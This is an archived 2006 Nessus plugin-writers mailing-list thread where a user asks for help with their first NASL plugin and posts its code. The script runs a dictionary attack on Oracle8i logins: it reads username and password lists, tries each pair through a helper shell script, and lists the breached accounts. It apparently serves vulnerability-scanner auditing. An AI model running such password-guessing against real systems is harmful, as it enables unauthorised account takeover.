Advanced
Mailing List Archive

Mailing List Archive

  1. Home >
  2. Nessus>
  3. plugins
(no subject)
gubs at mclink
Feb 6, 2006, 7:00 AM
Post #1 of 2 (1123 views)
Permalink
Hallo to everybody

TODAY'S TOPICS

i'm dooing my first nasl script.

Is a script that attack the authentication method of an
Oracle8i database in a remote host. I'm using for the
connection the instantclient package that is based on
sqlplus language. I'm developping this script with nasl
and without Hydra.

I have two question:

1) I would to know if in my Nessus (2.2.6) already exist some
> dictionary list that can i use to entry password and userid
> on my script. If yes, need i of some permission ? Are where
> locate this list ?

2) How is the nasl function to provide at the nessus client
> the possibility to set some parameter that my script can
> use at the scanning moment ?

_______________________________________________
Plugins-writers mailing list
Plugins-writers@list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers
(no subject) [ In reply to ]
gubs at mclink
Feb 6, 2006, 7:17 AM
Post #2 of 2 (1058 views)
Permalink
Sorry,

this is my plugin:

+# This script was written by Andrea Governatori <gubs@mclink.it>
+
+file_user = "username.txt";
+file_password = "passwd.txt";
+
+nomi_utente = fread(file_user);
+password = fread(file_password);
+
+array_names = split(nomi_utente);
+array_passwd = split(password);
+
+foreach name (array_names){
+ x = 0;
+ n = 1;
+ foreach passwd (array_passwd){
+ name = chomp(name);
+ passwd= chomp(passwd);
+ args = make_list ("netautent.sh" , name, passwd);
+ inizio = split(gettimeofday(), sep:'.', keep:0);
+ risultato = pread(cmd:"netautent.sh" , argv:args);
+ fine = split(gettimeofday(), sep:'.', keep:0);
+ inizio = int(substr(inizio[0], 7) + substr(inizio[1],0,2));
+ fine = int(substr(fine[0],7) + substr(fine[1],0,2));
+ tempo = fine - inizio;
+ output = name + ", " + passwd + ", " + tempo + " msec, " + risultato;
+ if ( int(risultato) == 0 ){
+ goal += output;
+ n++;
+ }
+ x++;
+ }
+}
+
+display("Su ", x ," account presenti nel database controllato sono\n");
+display("stati trovati ", n ," account vulnerabili.\n");
+display("=======================================================\n");
+display("Accounts violati:\n");
+display("username-password-tempo-risultato\n");
+display(goal , "\n");
+exit(0);


_______________________________________________
Plugins-writers mailing list
Plugins-writers@list.nessus.org
http://mail.nessus.org/mailman/listinfo/plugins-writers

©2024 GT.net. A Gossamer Threads company.
5th Floor, 455 Granville St., Vancouver, BC V6C 1T1, Canada | Legal